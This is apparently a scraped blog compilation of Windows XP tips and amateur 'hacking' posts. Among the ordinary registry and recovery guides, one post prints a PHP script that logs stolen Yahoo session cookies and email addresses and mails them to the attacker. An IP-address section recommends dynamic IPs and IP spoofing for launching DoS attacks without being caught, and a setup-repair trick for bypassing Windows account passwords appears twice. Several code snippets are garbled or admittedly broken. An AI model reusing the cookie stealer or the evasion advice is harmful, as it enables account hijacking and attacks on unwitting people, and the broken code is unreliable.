Create a new key called Command Prompt. For the default value, enter whatever text you want to appear when you right-click a folderfor example, Open Command Prompt.
Create a new key beneath the Command Prompt key called Command.
Set the default value to Cmd.exe /k pushd %L.
That value will launch Cmd.exe, which is the XP command prompt.
The /k switch puts the prompt into interactive mode.
That is, it lets you issue commands from the command prompt; the command prompt isn't being used to issue only a single command and then exit. The pushd command stores the name of the current directory, and %L uses that name to start the command prompt at it.
Exit the Registry.
The new menu option will show up immediately.

Note that it won't appear when you right-click a file; it shows up only when you right-click a folder.While many of us like fussing around with the Registry rather than doing things the easy way, there's also a way to add this option to your right-click context menu without editing the Registry.
Download and install a free copy of Microsoft's Open Command Window Here PowerToy from http://www.microsoft.com/windowsxp/pro/downloads/powertoys.asp.

Learn to HAck.....

Hackers are great Programmers . Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

Don’ts
No one will search for “how to become a hacker” & learn Hacking in google except newbie. People like to be a Hacker, and burst the network, server and so on. You can get a clear idea here. After reading this article you can get an idea about becoming as a Hacker.

Don’ts

Hacking Tools
Don’t search for “Download Hacking tools” , “Windows hacking tool” , “Hacking software” , “Email hacking”,’ Yahoo password cracking” or any thing.

Download tools
Don’t download such tools by above results. And don’t download and install tools from Yahoo chat room people or individuals. Because those tools may open your system’s backdoor and you will be hacked and your system will be used for Spamming proxy.

Key Loggers and Spy
Don’t download and install spy or key loggers to trace your roommates or your brother/sister. Don’t be proud of yourself that you successfully traced them. They will trace you for its Owner.

Start Hacking
Don’t test installed tools yourself against Yahoo.com or any other site. Don’t think Yahoo’s server will be hacked by you and that Lame tool.

Teach me how to hack
Don’t beg others by asking “teach me how to hack”, “Tell me how to hack”,” Help me in cracking this Y! Id”

Black/White Hat
Don’t punch tattoos like “Black Hat Hacker”, “The Hacker” & “Hack me if you can”

Username & Email
Don’t create Yahoo Ids like “HackMeAlive”, “Thomas_A_Peterson” and any suffix or prefix with the words Hacker, BlackHat & so on.

Hacker and Films
Don’t think yourself as a hacker after seeing “The Matrix” film and don’t try to dodge the dogs while they try to bite you.

How you can become a Hacker?
Learn Hacking


Improve Skills First learn things and improve your Skills. learn php for web development.

#A
Start writing small and small tools yourself, like port scanner, service scanner etc. In python,perl or such a simple but effective languages.

#B
Use them to protect your system and server.

#C
Read more articles about Bugs and fixes.

#D
Tune up yourself as a troubleshooter.

#E
Every backdoor has a Lock.Try to find the Locks or Make a better one.

#F
Try to understand the core things. For example Understand what is the kernel,Understand the Protocols, Start writing own protocols, Try to write a patch for linux kernal yourself.

#G
Be a Best Programmer.
Hacking is not means fully about exploiting and entering in to a network or server.


Modern Zen Poem:
To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.


I really appreciate your interest to become a hacker. Start learning and improving your skills. Best of luck.

How hackers steal or hack Yahoo Passwords....

This article is meant to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. It’s purely informative.


I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easyer to attack than to deffend they say.

It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email.

The bug:

…which calls this php script:

$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}

header(”Location:http://mail.yahoo.com”); ?> …which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly.

NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER

Tracing an HaCkEr

This summary is not available. Please click here to view the post.

How to recover from a corrupted registry that prevents Windows XP from starting

When you try to start or restart your Windows XP-based computer, you may receive one of the following error messages:


"Windows XP could not start because the following file is missing or corrupt:\WINDOWS\SYSTEM32\CONFIG\SYSTEM"

"Windows XP could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SOFTWARE "


"Stop: c0000218 {Registry File Failure} The registry cannot load the hive (file): \SystemRoot\System32\Config\SOFTWARE or its
log or alternate "

"System error: Lsass.exe"

When trying to update a password the return status indicates that the value provided as the current password is not correct.

Manual steps to recover a corrupted registry that prevents Windows XP from starting

The procedure that this article describes uses Recovery Console and System Restore.
This article also lists all the required steps in specific order to make sure that the process is fully completed.
When you finish this procedure, the system returns to a state very close to the state before the problem occurred.
If you have ever run NTBackup and completed a system state backup, you do not have to follow the procedures in parts two and three.
You can go to part four.

Part one
In part one, you start the Recovery Console, create a temporary folder, back up the existing registry files to a new location, delete the registry files at their existing location, and then copy the registry files from the repair folder to the System32\Config folder.
When you have finished this procedure, a registry is created that you can use to start Windows XP.
This registry was created and saved during the initial setup of Windows XP.
Therefore any changes and settings that occurred after the Setup program was finished are lost.

To complete part one, follow these steps:
1. Insert the Windows XP startup disk into the floppy disk drive, or insert the Windows XP CD-ROM into the CD-ROM drive, and then restart the computer.
Click to select any options that are required to start the computer from the CD-ROM drive if you are prompted to do so.
2. When the "Welcome to Setup" screen appears, press R to start the Recovery Console.
3. If you have a dual-boot or multiple-boot computer, select the installation that you want to access from the Recovery Console.
4. When you are prompted to do so, type the Administrator password. If the administrator password is blank, just press ENTER.
5. At the Recovery Console command prompt, type the following lines, pressing
ENTER after you type each line:
md tmp
copy c:\windows\system32\config\system
c:\windows\tmp\system.bak

copy c:\windows\system32\config\software
c:\windows\tmp\software.bak

copy c:\windows\system32\config\sam
c:\windows\tmp\sam.bak

copy c:\windows\system32\config\security
c:\windows\tmp\security.bak

copy c:\windows\system32\config\default
c:\windows\tmp\default.bak

delete c:\windows\system32\config\system
delete c:\windows\system32\config\software
delete c:\windows\system32\config\sam
delete c:\windows\system32\config\security
delete c:\windows\system32\config\default

copy c:\windows\repair\system
c:\windows\system32\config\system

copy c:\windows\repair\software
c:\windows\system32\config\software

copy c:\windows\repair\sam
c:\windows\system32\config\sam

copy c:\windows\repair\security
c:\windows\system32\config\security

copy c:\windows\repair\default
c:\windows\system32\config\default

6. Type exit to quit Recovery Console. Your computer will restart.

Note :- This procedure assumes that Windows XP is installed to the
C:\Windows folder.
Make sure to change C:\Windows to the appropriate windows_folder if it is a different location.
If you have access to another computer, to save time, you can copy the text in step five, and then create a text file called "Regcopy1.txt" (for example). To use this file, run the following command when you start in
Recovery
Console:


batchregcopy1.txt

With the batch command in Recovery Console, you can process all the commands in a text file sequentially. When you use the batch command, you do not have to manually type as many commands.

Part two

To complete the procedure described in this section, you must be logged on as an administrator, or an administrative user (a user who has an account in the Administrators group).
If you are using Windows XP Home Edition, you can log on as an administrative user.
If you log on as an administrator, you must first start Windows XP Home Edition in Safe mode. To start the Windows XP Home Edition computer in Safe mode, follow these steps.


Note Print these instructions before you continue. You cannot view these instructions after you restart the computer in Safe Mode.
If you use the NTFS file system, also print the instructions from Knowledge Base article KB309531.
Step 7 contains a reference to the article.

1. Click Start, click Shut Down (or click Turn Off Computer), click Restart, and then click OK (or click Restart).
2. Press the F8 key.

On a computer that is configured to start to multiple operating systems, you can press F8 when you see the Startup menu.

3. Use the arrow keys to select the appropriate Safe mode option, and then press ENTER.

4. If you have a dual-boot or multiple-boot system, use the arrow keys to select the installation that you want to access, and then press ENTER. In part two, you copy the registry files from their backed up location by using System Restore. This folder is not available in Recovery Console and is generally not visible during typical usage. Before you start this procedure, you must change several settings to make the folder visible:

1. Start Windows Explorer.
2. On the Tools menu, click Folder options.
3. Click the View tab.
4. Under Hidden files and folders, click to select Show hidden files and folders, and then click to clear the Hide protected operating system files (Recommended) check box.

5. Click Yes when the dialog box that confirms that you want to display these files appears.

6. Double-click the drive where you installed Windows XP to display a list of the folders. If is important to click the correct drive.

7. Open the System Volume Information folder. This folder is unavailable and appears dimmed because it is set as a super-hidden folder.Note This folder contains one or more _restore {GUID} folders such as "_restore{87BD3667-3246-476B-923F-F86E30B3E7F8}".


8. Open a folder that was not created at the current time. You may have to click Details on the View menu to see when these folders were created. There may be one or more folders starting with "RPx under this folder. These are restore points.

9. Open one of these folders to locate a Snapshot subfolder. The following path is an example of a folder path to the Snapshot folder:

C:\System Volume Information\_restore{D86480E3-73EF-47BC-A0EB-A81BE6EE3ED8}\RP1\Snapshot

10. From the Snapshot folder, copy the following files to the
C:\Windows\Tmp
folder:
• _REGISTRY_USER_.DEFAULT
• _REGISTRY_MACHINE_SECURITY
• _REGISTRY_MACHINE_SOFTWARE
• _REGISTRY_MACHINE_SYSTEM
• _REGISTRY_MACHINE_SAM


11. Rename the files in the
C:\Windows\Tmp folder as follows:

• Rename _REGISTRY_USER_.DEFAULT to DEFAULT
• Rename _REGISTRY_MACHINE_SECURITY to SECURITY
• Rename _REGISTRY_MACHINE_SOFTWARE to SOFTWARE
• Rename _REGISTRY_MACHINE_SYSTEM to SYSTEM
• Rename _REGISTRY_MACHINE_SAM to SAM

These files are the backed up registry files from System Restore. Because you used the registry file that the Setup program created, this registry does not know that these restore points exist and are available.
A new folder is created with a new GUID under System Volume Information and a restore point is created that includes a copy of the registry files that were copied during part one.
Therefore, it is important not to use the most current folder, especially if the time stamp on the folder is the same as the current time. The current system configuration is not aware of the previous restore points. You must have a previous copy of the registry from a previous restore point to make the previous restore points available again.

The registry files that were copied to the Tmp folder in the
C:\Windows folder
are moved to make sure that the files are available under Recovery Console.
You must use these files to replace the registry files currently in the
C:\Windows\System32\Config folder.
By default, Recovery Console has limited folder access and cannot copy files from the System Volume folder.


Part Three

In part three, you delete the existing registry files, and then copy the System Restore Registry files to the
C:\Windows\System32\Config folder:

1. Start Recovery Console.
2. At the command prompt, type the following lines, pressing
ENTER after you
type each line:

del c:\windows\system32\config\sam
del c:\windows\system32\config\security
del c:\windows\system32\config\software
del c:\windows\system32\config\default
del c:\windows\system32\config\system

copy c:\windows\tmp\software
c:\windows\system32\config\software

copy c:\windows\tmp\system
c:\windows\system32\config\system

copy c:\windows\tmp\sam
c:\windows\system32\config\sam

copy c:\windows\tmp\security
c:\windows\system32\config\security

copy c:\windows\tmp\default
c:\windows\system32\config\default

Note Some of these command lines may be wrapped for readability.

3. Type exit to quit Recovery Console. Your computer restarts.
Note This procedure assumes that Windows XP is installed to the
C:\Windows folder.
Make sure to change C:\Windows to the appropriate windows_folder if it is a different location.


If you have access to another computer, to save time, you can copy the text in step two, and then create a text file called "Regcopy2.txt" (for example).
To use this file, run the following command when you start in Recovery Console:

batch regcopy2.txt
Part Four

1. Click Start, and then click All Programs.
2. Click Accessories, and then click System Tools.
3. Click System Restore, and then click Restore to a previous RestorePoint.

Find every files on your PC by Editing registry

When you search for a file in Windows (choose Start, Search, For Files or Folders, or press in any Explorer or folder window to open the search pane),Windows searches only for file types it recognizes.
Files that aren't listed in the 'Registered file types' list are ignored (to view this list, open Explorer, choose Tools, Folder Options, and click the File Types tab).
So while 'Read_Me.xyz' may be a perfectly good file name to you, Windows pays it no mind because of the unrecognized '.xyz' file extension.
Fortunately, a simple edit of the Registry will make Windows search for every file, regardless of its extension.
Open the Registry Editor as described above,and then navigate to and select
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\ContentIndex.
Double-click the FilterFilesWithUnknownExtensions icon in the right pane, change the 0 in the 'Value data' box to 1, and
press .

Recovering the windows password

Many times we forget our Windows password. Then we panic, call experts and finally we lose all important information saved in Windows.
Now here is a way by which we can recover Windows password easily.
1. Place your Windows XP CD in your CD ROM and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your BIOS set to boot from CD)

2. Keep your eye on the screen messages for booting to your CD typically; it will be “Press any key to boot from CD”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (This will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”)

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.
Enjoy..!!

Easy way to find list of files just by right click.....

After this tutorial,an option will be available whenever you right-click any folder which will display all the files and sub-folders inside that folder and save it to a text file.

1. Create a .bat file...Open Notepad and copy-paste the following data in it.

cd %1dir /a /b /-p /o:gen >C:\filelist.txtstart notepad C:\filelist.txt

You can edit the path to your preference.Now name this file anything you wish and save it anywhere you wish.

2. Make file visible in right click context menu.
Open explorer window, Go to Tools>Folder Options..>File types and from the registered file types list,select FOLDER.
Click on Advanced>New....In the Action box, type in the name you want in context menu. For e.g. Generate File List..
Then click on Browse.., navigate to the .bat file whch u hav created with some name..created in step 1 .

3. Congratulations!!You are done with the tutorial!!. Now right click any folder and select Generate File Listing. A text file will be created in your C:\ drive [or any path you specified in the .bat file.] called filelist.txt which contains list of all files and sub-folders in the parent folder!
Even the hidden files are listed......

Be a hacker of ur own system Using "Group Policy"

So its time to have some fun with ur system.....you can change everything..n make disappear all the tabs,buttons....bla bla......using the Group Policy editor... n show ur friends..that u too are an hacker..........so lets start.

To start it, go to Start > Run, type in "gpedit.msc" and press "OK".
Here you will find two options "Computer configuration" and "User configuration".
So lets see what all changes we can do in the 1st option..
->Here u can do some tricks on customizing the Windows media player,Internet Explorer,Logon screen,user profiles....etc.So u can disable some of the properites u wish.........
And in the case of 2nd option..
->Doble click on the "User configuration" then go to "administrative templates".
Here you can find many other options related to ur system.
So from here you can understand all other things..........

And also u can find the solutions if u have any problem with your Task manager,Autoplay of cd's.........etc.So check out each and every option in this Group policy editor..have fun...
So keep rocking................

Note: This settings appears in the Computer Configuration and User Configuration folders. If both settings are configured, the setting in Computer Configuration takes precedence over the setting in User Configuration.

Customize your system Display properties....

You can hide the themes, screensaver, appearance and settings in the "Display Properties" window using the Group Policy Editor.
You can also create passwords for the screensavers to hav better privacy of ur system...

To start it, go to Start > Run, type in "gpedit.msc"(type this without the quotes)and press "OK".
Go to "User configuration" tab and then to "administrative templates".
Then go to "Control Panel", and there select "Display".
Double click "Hide Appearance and Themes tab", then click the "Enable" radio button.
Click Apply, then OK.
Your "Appearance" tab will disappear from the display properties.
In the same way, you can select "Hide screen saver tab", and "hide settings tab" to hide screensaver and settings from the display properties.
Similarly you also prevent changing of wallpaper.

Locking a folder without any software.....

I hope you will like this tutorial..!! This is the best way of locking any folder.
Copy the following code

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
gotoUNLOCK
if NOT EXIST Locker
goto MDLOCKER:CONFIRMecho
Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"if NOT %pass%==type your password here
goto FAILattrib -h -s
"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


* Now paste it in notepad.
* Change the "type your password here" with your password (Marked as bold in the above posted matter).
* Save it as batch file(with extension .bat).Any name will do.
* Now you see a batch file. Double click it to create a folder locker.
* A new folder named Locker would be formed at the same location.
* Now brings all the files you want to hide in the locker folder.
* Now double click the batch file to lock the folder namely Locker.
* If you want to unlock your files,double click the batch file again and you would be prompted for password.


***NOTE::Actually ive worked with this code...but there is an error...in it..
everything goes right..i.e a folder named locker will be created...n it will ask u whether to lock th folder or not....till then its fine.....but u cannot open the batch file again..i mean to say that..
the .bat file whch u saved doesnt open ......
so if u hav stored any files....in the locker...u can see them again only..wen u set ur folder options settings.....
GO to tools->folder options->view->
here u will have an option "Hide protected operating system files(Recommended)"...
Uncheck this box...
so u will find the hidden or the files u hav stored in the locker..

Read Your Scraps without Logging Into ur Orkut Account....

There is unique method to read your scraps without even logging in to your orkut account .
For that you just require your UID........dont take tension that whats uid???? just open your scrapbook.....check out the address bar : something like this link will be there
http://orkut.com/Scrapbook.aspx?uid=14729188335553301669
copy the code written after that 'uid=' ie here in above example uid is 14729188335553301669
Thats it.....
Now paste this Uid in following link and open the link in FireFox{4 better results,better look} or Internet Explorer{most sicko looks of your scrap book}...

And if you try to open this above link and your administrator has blocked this then use www.stupidcensorship.com n in on this site place the above mentioned link and start browsing.http://www.indian-tv.com/orkut.php?uid=[your uid]

Forgot ur XP password?????....

Many times we forget our Windows password. Then we panic, call experts and finally we lose all important information saved in Windows.
Now here is a way by which we can recover Windows password easily.

1. Place your Windows XP CD in your CD ROM and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your BIOS set to boot from CD)

2. Keep your eye on the screen messages for booting to your CD typically; it will be “Press any key to boot from CD”
3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it
.6. The next screen is the Setup screen which gives you the option to do a Repair.It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process
.7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.
8. Shortly after the Copying Files stage, you will be required to reboot. (This will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”)

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.
10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.
12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password).
Your programs and personalized settings should remain intact.

->Changing the root drive for CMD....

You might be aware of DOS prompt....its nothing but the cmd command.....
Just click the START button,n then click on the run button.....then in the box type cmd or cmd.exe.
U can observe dat the command prompt by default starts as...
C:\Document and Settings\>
so if u need to change the root directory to another drive of ur system..like
D:\> or
E:\>.....etc.
All u need is to copy the cmd.exe or cmd file which is located at
C:\WINDOWS\system32
and paste it in the drive u need.....
then when u run it from the desired hard drive..
u can see the root directory to be the letter of that drive...

or
just press the drive letter followed by the symbol colon ":"
like D:
E:
etc....

-> About IP address....

Everyone that connects to an network, has got a IP address. A IP address looks something like this : 80.65.123.25

Your network card has an IP and your modem has an IP address if you connect to the Internet, but both is diffident because your LAN is not part of the internet.
When you connect to Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users gets a IP address that changed every time they reconnect to internet, Very useful if you attack people, so if you disconnect, then you get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to internet you get the same IP every time.

Attack someone without IP spoofing, they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who does this IP belong to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and then can go mad and attack people and so without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but its too much of a hassle for a simple DOS attack.

IP spoofing is basically when you attack someone and you use a bogus IP. a DOS attack or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's that does not really exist, or it does excist but it is someone else's IP, not yours.

Every network cards has a burned in MAC address. a MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbstat on you, get your MAC address of your network card, it is a simple way of identifying you as the attacker